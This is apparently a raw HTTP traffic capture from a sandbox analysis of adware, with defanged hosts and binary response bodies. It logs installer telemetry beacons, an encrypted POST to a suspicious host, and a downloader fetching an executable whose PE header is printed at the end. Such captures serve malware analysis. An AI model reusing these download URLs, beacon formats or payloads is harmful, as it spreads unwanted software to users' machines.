0A0Czu0Y0B0RtN0U0I0DzutDtDyDtDyDyCtBtCtDtCyByEtCtCyD0FtN0W0VzuyCtFtCtN0W0S0PzutCtN0O0S0L1T1G1Nzu1P1GtN0E2V1P0C1M1J0S2Y1HzutAyDyEtCtDzytCyCyCtBtN1L1B0A1Q1H1L1GzutCtN0T0KzutAzzyEtAtAzytN0U0I0DzutDtDyDtDyDyCtBtCtDtCyByEtCtCyD0FtN0U0I0D0N1P2WzutDtDyDtDyDyCtBtCtDtCyByEtCtCyD0FtN0M0G0U0I0Dzu1RtDtAtBtB1T1R1QtGyD1PyD1QtGyEtB1OtDtG1StCyCtAtG1RyDzytC1P1PyC1O1OyD1SzytN0M0S0I0DzutBzzyDzztDtBtDzytAyDtGtBtCyDyCzyzytByDyDtDtGtAyCyDzztCtAtCzztDyEtN0S0I0D0U0I0Dzu0A0AyDzy0FtDyEyBzztDzytCtCzztByC0D0AtD0A0AzyyD0C0ByEzz0AtCtCyD0FtN0M0A0C1V0LzutDtDyDtDyDyCtBtCtDtCyByEtOtA0AtCzytBtFtCyCzztFtCtAzytFtCtAyDtOtA0AyCtOtA0AtCtN0S0D0TzutBtDtCyDtDyDtDtCtDtBtDyBtDzytDtBzztN0V0M0Czu0V0M0WtN1L1B0V0M0D1P1OzutCtN0P0E1V0M0O0D0Ezu0D0L0LtN1I1L2ZzutAyDyCyBzzzytN1L1Q1B1RzutByBtN0D0E0P1V0M0O0DzutBtN1L1B0A1Q1H1L1GzutCtN1L1B0U1T1R0O1GzutDtN1L1B0U1B1P1C0A1Q1H1L1GzutCtN0R0N1T1H1Pzu0CtOtA0AtOyD0C0U1B1P1C1BtOyD0C1T1Q1HtOyD0C0A1E1E0D1T2Z1TtOyD0C0L1F1R1T1ItOyD0C0T1P1H1EtOyD0C0T1P1H1EtOyD0C0O1NtA0C2X0TyBzz2X0S0M1TtD0NtD0L0P1T1LyB0Q2X2Z1NtA0C2X0TyBzz2X0S0M1TtD0NtD0L0P1T1LyB0Q2X2ZtOyD0CtAtCtDyBtCyE1V1L1BtF1P2V1PtN0O0S0L1T1G1Nzu1P1GtN0O0S0V1P1CzuyCtFtCtN0O0S0S0P0V1P1CzutCtN0O0S2VyCyEzutCtN0P0P0Nzu1TtCtDyC1RtAzz1PzyyCtCtBtByB1O1PyEtDtC1O1P1QtA1PtAyDyBtBzzyD1S1RtF1P2V1PtN0M1P1H0P1M0AzutCtAtByBtN0M1P1H0P1M0TzutBtDyEyBtN0M1P1H0V1L1C0AzutCzyyCyEtN0M1P1H0V1L1C0TzutBtDyEyBtN0P0R0O0D0U0C0T1V0T0I0T0L0Ezu1Q1P1B1E1C1F2Z1P2Z1F1C
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Date: Thu, 30 Apr 2015 23:07:07 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: nginx
X-ICSCT-CC: UA
X-ICSCT-CITY: Kharkiv
X-ICSCT-GICSET: global1373
X-ICSCT-IP: 193.138.244.231
X-ICSCT-SERVER-NAME: ads.slave-128-eu-west-1b-c298b624
X-ICSCT-TIMESTAMP: 20150430180707062
X-ICSCT-VERSION: 1.2.8
X-ICSCT-XC: 1f3cfb072bc5ded412eb0f20eaa0b3fa349c056a
X-Robots-Tag: none
transfer-encoding: chunked
Connection: keep-alive
1f00..w!..h...h.jq1.....~.....Q..NH...!.......$&..L......D.....c3.=4.a.wlZ..=. .j:Hc.u.c....xJ<?j../x:..:;."..1......"U].7..IR......Lc..=..7c!..p4H..-..p..EI.Ff.6qpZ..Zj..G.....C?.Q>.g.7.U.7...5.....>I..f.oq.v.G......e6...9.?...)n6.T...%..Yu..w....!.5.%.-.35%.[.<0.9.q...ao..J.......I.a.?ca..`!...T.....fR0.7i..3.\..}.6.)....O@.T%.....w....\kCX.S.Wf...5..t.........<....%gf.U.....9..5zf.tn._1|.a..4U_GA..;.t{..c.x).LX)..}q".....EMr...q..cl.....L....1"..m..!cnr..h3....l.GG==K.R.iR.[*...&...vt.. ....~.....Q....9..Kn.(....s..y..(.BZ.x..~m..'p..`0..)....86..x.?.~...{{..9:..82.zN..E.3.......&..|=...a...9..x..RI...{08p.r._)...i%.q.._.p<.5x..Z[..gv....7R.@S..J..g...tV,.......;..uO.[...5.?..{*......._.W92...J.L.s.992.TmC......Y0.u.?...?..)Z....Stl....2..A. a|?wU.3..y....5..z..[I....)X#~p:.......g4.d6%...zd..g.8...q..&.....W..p....b ...Y...O............c,.s.N.\.9.u........=...$l..@h.T...@.r.[.3...n...h.;. ?.y9..|....4..y..r.........).g.......d.8r.E.O3@.{..8.. ...F..=..0e...{.f."....K:..5. ,.r.......o.}.F.N*....A..Su...l...i..a.{. ..#..J4...iT...r..............4hX...=.a=.....T.h.f.st;.G,.z..^v..k..h..O..x...n....8O...../o....b...G.QC...S!H]iL.. ..9n..|2.z.8....$..1../...2..R..N......O.45.w...t.?].q5..>7;.".....*Y.B.w...X..,...f..6%..[..>z`?x...*.)Esn....H....G...xzI#.J.A"...Ow...vr.."b....3../zd.h.........-......CO.U.`...IkM.uh...XC.%A.Tc:xY|t...Q....a.k.z..D....3h.....-.7.._U.N.bk9..>.3..l.f....A2.5."......`.!...t!..t......|.F...k......$J....}x...%I.U..V1...e...f.n..p.NOU.uB....X.Q.a-....H@.......
<<< skipped >>>
GET /windowspm/up?ptid=pcm&sid=WindowsMangerProtect&ln=en_us&ver=20.0.0.2227&uid=&upv= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.theviilage.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 30 Apr 2015 23:08:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14p1
Content-Encoding: gzip
15............3............0..HTTP/1.1 200 OK..Server: nginx..Date: Thu, 30 Apr 2015 23:08:35 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..Vary: Accept-Encoding..X-Powered-By: PHP/5.2.14p1..Content-Encoding: gzip..15............3............0..
POST /?pcrc=497235937&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 688
Cache-Control: no-cache
....V.....2$.....R...\... Q.\......1Xu..o .F....TT........y. ..)..z.k..OIx.....9o1....J..!....A/....n2%.......|{")....Uq.w....hPT.d..U%...)DE.(.2..:SBy.W........A..k.S`.!.W..N.#.m.`g.\ST..u....... .8l....?...K._J....QnUU..J,.#........?......m.FY...z.-.a....@..(.9._2tZ...0p.......b...`........rQ*?.V.,...
|[@U5O..............(...? .Mf...M..7M.,,...$..4.U..D]y..Y..d b,....:N@.]..-.YR......f.{.[5.1.).............S.:..}=.Um.I.cYa.......`...-.,Ha/...X.tB............ .~.....Z<u.uG...s.../............6...H.L...`.r....%.S.....W~.c...FR[......IPx6:d..).C...C.O1...{.~B.6w..}b@JU....-..'.m../...?0....,.....!n......s.d.C2..U@Q...dL.2@.p...e..]p... ..X^.........K..6?...is_..|..WH.Tc...
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:08 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu, 30 Apr 2015 23:07:08 GMT..Server: TornadoServer/4.0.2..Content-Length: 4..Connection: keep-alive..DONE..
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTEemCaVgs8Tuh2B9fGVE0pKKNyzgQUTF+nNhcF4oZhIkk5jLmo40rgOBoCEC6utoKGY/7ZdVX4/iTzOxo= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1552
content-transfer-encoding: binary
Cache-Control: max-age=521950, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 00:10:33 GMT
Expires: Thu, 7 May 2015 00:10:33 GMT
Date: Thu, 30 Apr 2015 23:12:34 GMT
Connection: keep-alive
0..........0..... .....0......0...0........C...4N...@..6...v...20150430001033Z0s0q0I0... .........z`.V.<N.v...TM)(.r...L_.6....a"I9....J.8........c..uU..$.;.....20150430001033Z....20150507001033Z0...*.H.............e...E;....(..c.Fd...h@.e.....,.jPVAh..z...4..eL. ....2.G9.i}..H..!.}..........<.w..0W......a...S.K)AR.h..N...V}.5:,..xE......n..jn.:wg.h{....D.:-...~.7....L?..W...<.Vm..5.6o.g...3..=...f.R.W(.t.`.. &.4:..d....K..K..A./.e.d..W..K=a..l......f...........0.......50..10..-0..........y.P}~.EY....T]. 0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1<0:..U...3Class 3 Public Primary Certification Authority - G21:08..U...1(c) 1998 VeriSign, Inc. - For authorized use only1.0...U....VeriSign Trust Network0...141202000000Z..151216235959Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Symantec Trust Network1?0=..U...6Symantec Class 3 PCA - G2 OCSP Responder Certificate 30.."0...*.H.............0..........6..]......w';.r........I..c..4.... .........TyW......hd_.....!C.k......SE<?o.H.. .me.c..9N.&....e.^-..a.....i\:..*."..u...|....".Nf3.~.L...QW...p.....-]UV8U...J&.<./.G.....I...4.T....#I*.i.E0\..~q$.I.......X?G....f.t......v.l.U.Ld.I...B.....=...Sf...H.s.........0..0...U....0.0l..U. .e0c0a..`.H...E....0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......0...hXXp://VVV.symauth.com/rpa0...U.%..0... .......0...U........0... .....0......0!..U....0...0.1.0...U....TGV-B-2740...*.H............1.`...i.....H.C.i.9~.i..Z.r.*$..(./.ag9.....J.Q.~.`.$?b..C....<.h.........d&....3.kV.....f.
<<< skipped >>>
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRODEXefhs/UZFum2o8YfzOFwceMwQUkz5j3yJ0BOBkhDHd2yOfDq+2TZMCEA89qsgV9niZmSI6gIO0S/U= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1725
content-transfer-encoding: binary
Cache-Control: max-age=565181, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 12:10:12 GMT
Expires: Thu, 7 May 2015 12:10:12 GMT
Date: Thu, 30 Apr 2015 23:12:34 GMT
Connection: keep-alive
0..........0..... .....0......0...0......%bn.$..5.......?'4....20150430121012Z0s0q0I0... ........N.E.~.?Q.n.j<a.....3...>c."t..d.1..#....M....=....x..":...K.....20150430121012Z....20150507121012Z0...*.H..............B.l..8........Gs/........"..........G...{?.^....R..'...)..........J...0.R.l..)........W.N........D...D.K.....C....y.<....Y.S....#93..B.}....6....%..3Sf... ...j..S=.,@....N.......[..%.yI_...1......)....N{.JOL....7..Ts..E.....qM@R.F.....J...M.R.C{.D~.j~...{....0...0...0..........7.R.~|..r."....#0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)091.0,..U...%VeriSign Class 3 Code Signing 2009 CA0...150401000000Z..150630235959Z0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1VeriSign Class 3 Code Signing 2009 OCSP Responder0.."0...*.H.............0..........z..|..>.....5.Z ...2.C MWIH.5......M.\.... ...eW..`.B=..`:..R. ...Z.k.Y.....p@.(3.c....a.;..[E....J:'...`...B....M..&......{. (........%......^[v[....m....*.T.o&4..3.....3.........G...e)...'?.K..2s..8=?..z.:..T..-.8R..8wv7*U.K..c...<s...]{.........6.?_...........0...0...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://www.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U........0... .....0......0"..U....0...0.1.0...U....TGV-B-34920...*.H.............,..-......q3a........z....t;B.z.h...]...#}.6.,..YU..
<<< skipped >>>
GET /SL2 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/150814s/150814c.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: pcmega.go2cloud.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 30 Apr 2015 23:07:09 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: nginx/1.7.9
Content-Length: 43
Connection: keep-alive
GIF89a.............!.......,...........D..;..
GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQDstfTWy5byVg== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:54 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120452, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:25:06 GMT
Expires: Sat, 02 May 2015 10:25:06 GMT
ETag: "e6664fd0595206b2ff0e579607b274885636c2c5"
Content-Length: 1788
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G2..20150430222506Z0l0j0B0... ..........._lkv...8..f..R34N..@..'..4.0.3..l...,............V....20150430222506Z....20150502102506Z0...*.H..............7y......\..b.H].W.]..}.$...R..&.1.0....<.Q.m......=......I..^..1...L.7..p.....E......#.UI....,P.4&.n....u!..ep..xZb.V.v.R\.FpN .%.......C.9......U.)X.#..=o.^.G.k..U..{.^.$1tE..\...[.5..75....]....b..w..j....N.0.V...-vh......e..........L..N_.[KS....%B.9".D....0...0...0..........,.z.Hl..0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.1-0 ..U...$hXXp://certs.godaddy.com/repository/1301..U...*Go Daddy Secure Certificate Authority - G20...150316070000Z..160316070000Z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G20.."0...*.H.............0.........xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D....l=.HS.N......A..;HTTP/1.1 200 OK..Date: Thu, 30 Apr 2015 23:11:54 GMT..Server: Apache..Content-Transfer-Encoding: Binary..Cache-Control: max-age=120452, public, no-transform, must-revalidate..Last-Modified: Thu, 30 Apr 2015 22:25:06 GMT..Expires: Sat, 02 May 2015 10:25:06 GMT..ETag: "e6664fd0595206b2ff0e579607b274885636c2c5"..Content-Length: 1788..Connection: close..Content-Type: application/ocsp-response..0..........0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizona1.0
<<< skipped >>>
GET /s9.g?login=pcofferp&jv=y&j=y&srw=1716&srb=32&l=http://VVV.4threquest.me/registro/310113f8.htm HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: e0.extreme-dm.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Thu, 30 Apr 2015 23:07:06 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
Cache-Control: private,no-cache,no-store
Pragma: no-cache
Expires: Mon, 28 Sep 1970 06:00:00 GMT
GIF89a.............!.......,...........L..;..
GET /services/rules.txt?dummy=908 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.gosaferllc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Sun, 28 Dec 2014 17:27:37 GMT
ETag: "5a246f5-10-50b4a12f3b440"
Accept-Ranges: bytes
Content-Length: 16
Cache-Control: max-age=600
Expires: Thu, 30 Apr 2015 23:17:22 GMT
P3P: CP="Potato"
X-Cache: BYPASS
</body>|</body>.....
GET /services/update.php?v=1.0.0&key=OuKz1Yi6BxlXdCQ8IZpYGGBgz2TyMvRv&dummy=408 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.gosaferllc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:23 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
Content-Length: 0
X-Cache: BYPASS
HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Thu, 30 Apr 2015 23:07:23 GMT..Content-Type: text/html..Connection: keep-alive..X-Powered-By: PHP/5.5.15..P3P: CP="Potato"..Content-Length: 0..X-Cache: BYPASS..
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.hp HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:18 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.85 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 2015 23:07:18 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.85 ms","message":"store 1 action and 0 update "}..0......
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.nt.ff.tab HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:25 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
4a..{"stats":"ok","time":"289.61 ms","message":"store 1 action and 0 update "}..0..
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRIt2RJ89X++hEzqoBeQg8PymQ2UQQUANhaTCXBIuWLMe9tuvPMXynxDWECEGVSJuGyLhjhWQ8phawi51w= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1453
content-transfer-encoding: binary
Cache-Control: max-age=552950, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 08:45:10 GMT
Expires: Thu, 7 May 2015 08:45:10 GMT
Date: Thu, 30 Apr 2015 23:12:10 GMT
Connection: keep-alive
0..........0..... .....0......0...0......T3t.%..O.E..~..F.=....20150430084510Z0s0q0I0... ........H.dI.....3..^B...d6Q....ZL%."..1.m..._)..a..eR&.....Y.)..".\....20150430084510Z....20150507084510Z0...*.H.............S.F1....m^.f...(.Ss@*M`:_.GI.Y.I"..}M@........*....o9-.{2W..)'./.A....VIl....Xy......#.J..!..z.Q...0.Z.W.e....{D...tm..=.(........W.3G.t..mw....#tn%n.P...,...E.mD.N..P.b.qY..|.c.>..xBZ.J.l.G..wx.......y.89...@.i.~.?.o.x.k.KB......6.....g.owYk........B(...D....0...0...0..3......./...b.v..-....l}0...*.H........0_1.0...U....US1.0...U....VeriSign, Inc.1705..U....Class 3 Public Primary Certification Authority0...141202000000Z..151216235959Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Symantec Trust Network1?0=..U...6Symantec Class 3 PCA - G1 OCSP Responder Certificate 30.."0...*.H.............0..........'......Y..x.3B1.7..Q..`..d.. ....s..t.$a.....j2R.{ ,*..c{.3.....H..3-; ).....0._...*..9M..V...... ...{m...-.......)..tR..{D....~...M...T..pS.p..^|o....S..v.).).....r.v.qo$......C.V!....@.h#qh...u1T.].G0.]E...=._...... ........TE...Sa.s4........r...3.............0..0...U....0.0l..U. .e0c0a..`.H...E....0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......0...hXXp://VVV.symauth.com/rpa0...U.%..0... .......0...U........0... .....0......0!..U....0...0.1.0...U....TGV-B-2730...*.H.............$..H......oU....Y!.z{*.V.M..u.._z..3>.. 0....3..m.....e.......a..D...........e..F6:.y.....di.......<y.Z.......x}..q.2....UZ1 :,....
<<< skipped >>>
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAxNF3PJUX7iAOhAP2oGxcI= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1790
content-transfer-encoding: binary
Cache-Control: max-age=361763, public, no-transform, must-revalidate
Last-Modified: Tue, 28 Apr 2015 03:40:02 GMT
Expires: Tue, 5 May 2015 03:40:02 GMT
Date: Thu, 30 Apr 2015 23:12:11 GMT
Connection: keep-alive
0..........0..... .....0......0...0......'.V.8.F.V....H....JW..20150428034002Z0s0q0I0... ..........!7h....O.d...AG&h.....k.&p..?...-.5........M.s.Q~...@?j.......20150428034002Z....20150505034002Z0...*.H..............>...|.#%....9.x.Fl.{.j..i.{<...B......5h..T.....<....).nU,7.L.,UpM&F9~.....ye.wpA.W.(9...VO{R.".~.C..G.t.*B...L......D.tj.............@.F......O$...zL........{..G...............].A..z..:{.*&*..2QS..s..Nt3..G..CR..D...-.T....H...l.7\..z..:.E.}L.Yk.Zvc..[.....#0...0...0..........r..?.*......y"..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code Signing 2009-2 CA0...150226000000Z..150527235959Z0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)091<0:..U...3VeriSign Class 3 Code Signing 2009-2 OCSP Responder0.."0...*.H.............0.............m5*R........2....>...yU4..L.. ...........u..Hez..Pn.....d...nz(...V7.}^...d!RX...bl..[..a...L.. .~..Ij......%..%p.-...u..:..i..F*]...*....{NH..|0...gHX.Q.r....S..........._.9.(w...suC...N..s.....&."...:.C.Q.i~rl..<..krS..8.B..o].y..L.4...iB@..s.....mw.........0...0...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U........0... .....0......0"..U....0...0.1.0...U....TGV-B-32010...
<<< skipped >>>
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ChromeSync HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:39 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.20 ms","message":"store 1 action and 0 update "}..0..
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.regok HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:21 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.63 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 2015 23:07:21 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.63 ms","message":"store 1 action and 0 update "}..0..
GET //MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:52 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120329, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:22:55 GMT
Expires: Sat, 02 May 2015 10:22:55 GMT
ETag: "c6961d1bde2c92575adba40476a0f961c1ef5e15"
Content-Length: 1708
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0......0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Daddy Root Validation Authority - G1..20150430222255Z0f0d0<0... ......... ......]..J^.y_..F<........L.q.a.=....j...........20150430222255Z....20150502102255Z0...*.H..............z...ue.`iK..sr.Q.2.....)q7....c........(.".....eZ..<..9$....]..Ws. 6.N@.......M.Us.;...h..58.z.........g.......y.......#. ....U.v........;.".U`....O...l3.$$..-L\.i9.#{tlf{.[J.R..RO.u....Te.\L.....?U..vM.q..%..5..b...[..h-.F.c...v.iz.....BS.h`.td.....W..Z....m0..i0..e0..M...........T.m^'0...*.H........0c1.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authority0...150316070000Z..160316070000Z0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Daddy Root Validation Authority - G10.."0...*.H.............0.........xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D....l=.HS.N......A..;....C)...(..T........XA-N....k1 .....ag...,4.L{.I..hEKb..K.....HTTP/1.1 200 OK..Date: Thu, 30 Apr 2015 23:11:52 GMT..Server: Apache..Content-Transfer-Encoding: Binary..Cache-Control: max-age=120329, public, no-transform, must-revalidate..Last-Modified: Thu, 30 Apr 2015 22:22:55 GMT..Expires: Sat, 02 May 2015 10:22:55 GMT..ETag: "c6961d1bde2c92575adba40476a0f961c1ef5e15"..Content-Length: 1708..Connection: close..Content-Type: application/ocsp-response..0..........0..... .....0......0...0......0..1.0...U....US1.0...U....A
<<< skipped >>>
GET /310714d/310714_cr.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: application/octet-stream
Content-Length: 1085040
Last-Modified: Thu, 30 Apr 2015 23:07:02 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t 